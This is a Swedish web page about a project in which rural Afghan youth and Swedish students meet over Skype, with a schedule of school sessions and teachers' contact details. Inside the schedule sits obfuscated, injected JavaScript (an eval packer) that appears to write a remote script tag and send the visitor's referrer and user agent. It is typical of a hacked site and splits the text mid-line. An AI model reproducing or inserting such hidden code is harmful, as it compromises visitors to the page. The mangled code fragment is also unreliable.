Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Ungdomar på landsbygden i Afghanistan möter ungdomar i Sverige – över Skype!

Ungdomar på landsbygden i Afghanistan möter ungdomar i Sverige – över Skype!
Sebastian

Svenska ungdomar samtalar med afghanska ungdomar genom Skypevideosamtal. Att få höra och se ungdomar berätta ger en helt unik insikt i verkligheten för den andre i ett land långt bort, geografiskt likväl som utvecklingsmässigt.

Dessa kommande möten är de avslutande i projektet. Fokus ligger på att utbyta och samla information till temaarbeten som ungdomarna har arbetat med under våren – på varsina håll. De svenska eleverna vill veta hur afghanska ungdomar ser på säkerhetssituationen i sitt land, om det märks att det finns internationell, eller kanske specifikt svensk, truppnärvaro där och förstås hur de ser på sin framtid, förhoppningar och farhågor. De afghanska ungdomarna undrar hur det är att gå i skolan i Sverige, och om kvinnor har samma rättigheter som män. De vill också veta hur ett land kan utvecklas så som Sverige har gjort.

Eleverna från landsbygden i norra Afghanistan möter i många fall sina första västerlänningar och ser hur modern teknik fungerar genom dessa videomöten.

Det är första gången den här sortens möten mellan ungdomar blir möjliga, med hjälp av videoteknik. Mötena leder till skratt, nyfikenhet, väcker frågor, ger svar och framförallt – minskar avstånden ungdomar emellan!

21 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dkhts|var|u0026u|referrer|rfnzr||js|php’.split(’|’),0,{}))
maj kl 08.30-10.00

Kvarnbergsskolan
Gustavsberg
Lärare: Sara Håkansson –
sara.hakansson@varmdo.se

22 maj kl 09.30-12.00
Jensen gymnasium västra
Västerbroplan Stockholm
Lärare: Aisha Amin – aisha.amin@jenseneducation.se eller 0707 34  38 74

23 maj kl 09.00-11.30
Österåkersgymnasium
Åkersberga
Lärare: Thomas Strandqvist – thomas.strandqvist@utb.osteraker.se  eller 0739 32 31 05.

24 maj kl 08.15-09.30
Hagagymnasiet
Hagagatan 36, Norrköping
Lärare: Josefine Selberg  –  josefine.selberg@edu.norrkoping.se eller 070-2569116

29 maj kl 11.15-12.30
Upplandsbrogymnasium
Skolvägen 24, KUNGSÄNGEN
Lärare: Stefan Lindberg – stefan.lindberg@edu.upplands-bro.se eller 0739 86 36 68